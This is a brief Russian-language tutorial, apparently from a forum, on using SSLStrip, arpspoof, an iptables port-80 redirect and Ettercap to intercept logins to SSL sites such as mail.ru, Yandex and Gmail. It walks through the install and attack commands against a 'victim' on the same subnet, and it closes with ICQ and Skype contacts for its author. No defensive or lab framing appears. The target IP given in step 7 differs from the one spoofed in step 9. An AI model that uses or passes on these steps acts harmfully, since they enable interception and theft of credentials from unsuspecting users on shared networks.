|
SSLStrip используется для атаки MITM чтобы получить доступ к сайтам с SSL, например auth.mail.ru passport.yandex.ru
Необходим следующий набор ПО
SSLStrip
ARPSpoof
Ettercap
Ubuntu Linux
Подключение к Интернет )))
Цель должна быть в той же подсети
Шаг 1: - Сначала загружаем SSLStrip с http://www.thoughtcrime.org/software/sslstrip/
Шаг 2: - Распаковать скачанные файлы "tar -zxvf sslstrip-0.4.tar.gz"
Шаг 3: - Устанавливаем SSLStrip "python setup.py build"
Шаг 4: - Установите SSLStrip командой "sudo Python setup.py install", соответственно понадобятся права рута.
Шаг 5: - Ставим ARPSpoof "sudo apt-get install dsniff"
Шаг 6: - Ставим Ettercap "sudo apt-get install ettercap"
Шаг 7: - В данном случае адрес цели - 172.168.1.3
Шаг 8: - Убедитесь, что шлюз по умолчанию у Вас такой же как у жертвы
Шаг 9: - Открываем три вкладки в терминале 0 в первой запускаем спуфер "sudo arpspoof -t 172.168.1.4 172.168.1.1"
Шаг 10: - На второй вкладке перекидываем запросы на порт 1000 "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000"
ну и, собственно, нужно запустить "sslstrip"
Шаг 11: - В третьей кладке запускаем ettercap
Шаг 12: - Ждём пока цель зайдут на gmail или аналогичный сайт с авторизацией по SSL
|
ICQ: 588519443 
Skype: pTraffer